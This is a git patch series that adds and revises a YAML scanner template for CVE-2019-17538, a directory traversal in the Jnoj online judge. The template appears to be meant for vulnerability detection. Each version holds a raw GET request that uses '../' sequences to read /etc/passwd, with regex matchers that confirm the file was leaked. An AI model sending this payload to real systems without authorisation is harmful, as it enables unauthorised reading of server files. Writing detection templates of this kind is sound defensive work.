From 780c343a95d0a85855217cccff2fcb1810c895ff Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 1 Mar 2021 16:56:08 +0530 Subject: [PATCH 1/6] Add files via upload Jnoj Directory Traversal --- cves/CVE-2019-17538.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 cves/CVE-2019-17538.yaml diff --git a/cves/CVE-2019-17538.yaml b/cves/CVE-2019-17538.yaml new file mode 100644 index 0000000000..d42aa4f3eb --- /dev/null +++ b/cves/CVE-2019-17538.yaml @@ -0,0 +1,21 @@ +id: CVE-2019-17538 +info: + name: Jnoj Directory Traversal for file reading(LFI) + author: pussycat0x + severity: High + reference: https://github.com/shi-yang/jnoj/issues/53 + tegs: cve.cve2019,jnoj,cms +requests: + - raw: + - | + GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1 + Content-Type: application/x-www-form-urlencoded + matchers-conditions: and + matchers: + - type : regex + regex: + - "root:[x*]:0:0" + - type: status + status: + - 200 + From 0a768b9d954d47736e5d574b3888532151609857 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 1 Mar 2021 16:58:56 +0530 Subject: [PATCH 2/6] Delete CVE-2019-17538.yaml --- cves/CVE-2019-17538.yaml | 21 --------------------- 1 file changed, 21 deletions(-) delete mode 100644 cves/CVE-2019-17538.yaml diff --git a/cves/CVE-2019-17538.yaml b/cves/CVE-2019-17538.yaml deleted file mode 100644 index d42aa4f3eb..0000000000 --- a/cves/CVE-2019-17538.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: CVE-2019-17538 -info: - name: Jnoj Directory Traversal for file reading(LFI) - author: pussycat0x - severity: High - reference: https://github.com/shi-yang/jnoj/issues/53 - tegs: cve.cve2019,jnoj,cms -requests: - - raw: - - | - GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1 - Content-Type: application/x-www-form-urlencoded - matchers-conditions: and - matchers: - - type : regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 - From e281df8e1ffd972445bda94686bd585d51d26021 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 1 Mar 2021 16:59:32 +0530 Subject: [PATCH 3/6] Add files via upload Jnoj Directory Traversal --- cves/2019/CVE-2019-17538.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 cves/2019/CVE-2019-17538.yaml diff --git a/cves/2019/CVE-2019-17538.yaml b/cves/2019/CVE-2019-17538.yaml new file mode 100644 index 0000000000..d42aa4f3eb --- /dev/null +++ b/cves/2019/CVE-2019-17538.yaml @@ -0,0 +1,21 @@ +id: CVE-2019-17538 +info: + name: Jnoj Directory Traversal for file reading(LFI) + author: pussycat0x + severity: High + reference: https://github.com/shi-yang/jnoj/issues/53 + tegs: cve.cve2019,jnoj,cms +requests: + - raw: + - | + GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1 + Content-Type: application/x-www-form-urlencoded + matchers-conditions: and + matchers: + - type : regex + regex: + - "root:[x*]:0:0" + - type: status + status: + - 200 + From 3a9f49972b4d40ee8be80cbd37dd85db9f0a1098 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 1 Mar 2021 17:25:56 +0530 Subject: [PATCH 4/6] Jnoj Directory Traversal --- cves/2019/CVE-2019-17538.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-17538.yaml b/cves/2019/CVE-2019-17538.yaml index d42aa4f3eb..669e23d523 100644 --- a/cves/2019/CVE-2019-17538.yaml +++ b/cves/2019/CVE-2019-17538.yaml @@ -4,7 +4,7 @@ info: author: pussycat0x severity: High reference: https://github.com/shi-yang/jnoj/issues/53 - tegs: cve.cve2019,jnoj,cms + tags: cve.cve2019,jnoj,cms requests: - raw: - | From 1c7cd8921ea49d5aeedaa4a29c7404e4b9aff25c Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Mon, 1 Mar 2021 17:26:36 +0530 Subject: [PATCH 5/6] syntax update --- cves/2019/CVE-2019-17538.yaml | 16 +++++++++------- 1 file changed, 9 insertions(+), 7 deletions(-) diff --git a/cves/2019/CVE-2019-17538.yaml b/cves/2019/CVE-2019-17538.yaml index d42aa4f3eb..485a98cdef 100644 --- a/cves/2019/CVE-2019-17538.yaml +++ b/cves/2019/CVE-2019-17538.yaml @@ -4,18 +4,20 @@ info: author: pussycat0x severity: High reference: https://github.com/shi-yang/jnoj/issues/53 - tegs: cve.cve2019,jnoj,cms + tegs: cve.cve2019,jnoj,lfi + requests: - raw: - | GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1 Content-Type: application/x-www-form-urlencoded - matchers-conditions: and + + matchers-condition: and matchers: - - type : regex - regex: - - "root:[x*]:0:0" - type: status status: - - 200 - + - 200 + - type: regex + regex: + - "root:[x*]:0:0:" + part: body From ff198c3ad920071e484439617ba7396ac162ae24 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Mon, 1 Mar 2021 17:30:49 +0530 Subject: [PATCH 6/6] Update CVE-2019-17538.yaml --- cves/2019/CVE-2019-17538.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-17538.yaml b/cves/2019/CVE-2019-17538.yaml index 485a98cdef..8fd852fb23 100644 --- a/cves/2019/CVE-2019-17538.yaml +++ b/cves/2019/CVE-2019-17538.yaml @@ -2,7 +2,7 @@ id: CVE-2019-17538 info: name: Jnoj Directory Traversal for file reading(LFI) author: pussycat0x - severity: High + severity: high reference: https://github.com/shi-yang/jnoj/issues/53 tegs: cve.cve2019,jnoj,lfi